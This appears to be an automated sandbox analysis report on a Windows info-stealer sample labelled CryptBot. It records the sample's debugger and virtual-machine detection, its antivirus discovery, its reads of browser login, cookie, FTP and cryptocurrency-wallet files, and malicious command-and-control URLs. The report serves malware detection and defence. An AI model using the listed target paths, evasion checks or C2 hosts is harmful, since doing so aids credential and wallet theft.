                Source: hx0wBsOjkQ.exe, hx0wBsOjkQ.exe, 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: hx0wBsOjkQ.exe, 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe File opened: NTICE
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe File opened: SICE
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe File opened: SIWVID
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe Code function: 0_2_0041E110 LdrInitializeThunk,0_2_0041E110

                HIPS / PFW / Operating System Protection Evasion

                Source: hx0wBsOjkQ.exe, hx0wBsOjkQ.exe, 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: WProgram Manager
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1626918311.0000000000E0B000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000002.1673742160.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1672776832.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1672925313.0000000000E0B000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000002.1673817152.0000000000E0B000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1626918311.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1626918311.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1626755261.0000000000E72000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                Source: Yara match File source: Process Memory Space: hx0wBsOjkQ.exe PID: 8048, type: MEMORYSTR
                Source: Yara match File source: sslproxydump.pcap, type: PCAP
                Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1627174690.0000000000E20000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Electrum
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1627174690.0000000000E20000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/ElectronCash
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1627174690.0000000000E20000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1627174690.0000000000E20000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ppdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Versio
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1627174690.0000000000E20000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: :"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exod
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1627174690.0000000000E20000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ExodusWeb3
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1627174690.0000000000E20000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Ethereum
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1599170541.0000000000E5A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1599170541.0000000000E5A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqlite
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\logins.json
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cert9.db
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\prefs.js
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\formhistory.sqlite
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.db
Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe, File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe, File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe, File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe, File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe, File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe, File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe, File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe, File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe, File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe, File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe, File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe, File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe, File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe, File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe, File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe, File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe, Directory queried: C:\Users\user\Documents\NYMMPCEIMA
Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe, Directory queried: C:\Users\user\Documents\LHEPQPGEWF
Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe, Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe, Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe, Directory queried: C:\Users\user\Documents\SNIPGPPREP
Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe, Directory queried: C:\Users\user\Documents\HMPPSXQPQV
Source: Yara match, File source: Process Memory Space: hx0wBsOjkQ.exe PID: 8048, type: MEMORYSTR

                Remote Access Functionality

Source: Yara match, File source: Process Memory Space: hx0wBsOjkQ.exe PID: 8048, type: MEMORYSTR
Source: Yara match, File source: sslproxydump.pcap, type: PCAP
Source: Yara match, File source: decrypted.memstr, type: MEMORYSTR
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 12 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Process Injection | 44 Virtualization/Sandbox Evasion | 2 OS Credential Dumping | 1 Query Registry | Remote Services | 1 Archive Collected Data | 21 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Process Injection | LSASS Memory | 851 Security Software Discovery | Remote Desktop Protocol | 41 Data from Local System | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 44 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 3 Obfuscated Files or Information | NTDS | 2 Process Discovery | Distributed Component Object Model | Input Capture | 114 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 12 Software Packing | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 223 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop

Source | Detection | Scanner | Label | Link
hx0wBsOjkQ.exe | 54% | Virustotal | | Browse
hx0wBsOjkQ.exe | 58% | ReversingLabs | Win32.Trojan.CryptBot |
hx0wBsOjkQ.exe | 100% | Avira | TR/Crypt.XPACK.Gen |
hx0wBsOjkQ.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                                                                                                                http://ocsp.rootca1.amazontrust.com0:hx0wBsOjkQ.exe, 00000000.00000003.1566258618.00000000057FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=english&ahx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://www.ecosia.org/newtab/hx0wBsOjkQ.exe, 00000000.00000003.1519093027.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1518843947.00000000057FF000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1518974641.00000000057FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://steamcommunity.com/profiles/76561199724331900/inventory/hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1626755261.0000000000E61000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1643372396.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495301417.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1599170541.0000000000E5A000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1643550627.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495487358.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1517261667.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1599605647.0000000000E61000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1623931109.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brhx0wBsOjkQ.exe, 00000000.00000003.1567544621.00000000058E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://store.steampowered.com/privacy_agreement/hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=enghx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&amhx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://prisonyfork.buzz:443/apiahx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495301417.0000000000DD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                unknown
                                                                                                                                https://store.steampowered.com/about/hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://steamcommunity.com/my/wishlist/hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&amp;hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://help.steampowered.com/en/hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://steamcommunity.com/market/hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://store.steampowered.com/news/hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://www.marriott.com/default.mi?utm_source=admarketplace&utm_medium=cpc&utm_campaign=Marriott_Prhx0wBsOjkQ.exe, 00000000.00000003.1592981595.00000000057D3000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1591591909.00000000057D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=hx0wBsOjkQ.exe, 00000000.00000003.1519093027.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1518843947.00000000057FF000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1518974641.00000000057FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://store.steampowered.com/subscriber_agreement/hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495301417.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495487358.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1517261667.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orghx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495301417.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495487358.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1517261667.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://lev-tolstoi.com/apishx0wBsOjkQ.exe, 00000000.00000003.1672980605.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1643550627.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000002.1673929346.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1643372396.0000000000E72000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                    unknown
                                                                                                                                                    https://steamcommunity.com/discussions/hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://store.steampowered.com/stats/hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amhx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://lev-tolstoi.com/apillhx0wBsOjkQ.exe, 00000000.00000003.1517343643.0000000000E20000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                          unknown
                                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pnghx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&amp;l=english&ahx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://store.steampowered.com/steam_refunds/hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://x1.c.lencr.org/0hx0wBsOjkQ.exe, 00000000.00000003.1566258618.00000000057FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://x1.i.lencr.org/0hx0wBsOjkQ.exe, 00000000.00000003.1566258618.00000000057FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqrfQHr4pbW4ZbWfpbY7ReNxR3UIG8zInwYIFIVs9eYihx0wBsOjkQ.exe, 00000000.00000003.1591591909.00000000057D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchhx0wBsOjkQ.exe, 00000000.00000003.1519093027.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1518843947.00000000057FF000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1518974641.00000000057FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&ahx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495301417.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495487358.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp;l=ehx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://steamcommunity.com/workshop/hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://support.mozilla.org/products/firefoxgro.allhx0wBsOjkQ.exe, 00000000.00000003.1567544621.00000000058E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&amp;l=english&amp;_chx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://lev-tolstoi.com/apiaLxzhx0wBsOjkQ.exe, 00000000.00000003.1567527406.00000000057D7000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1565923725.00000000057D4000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1566258618.00000000057D4000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1566708973.00000000057D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                                                      unknown
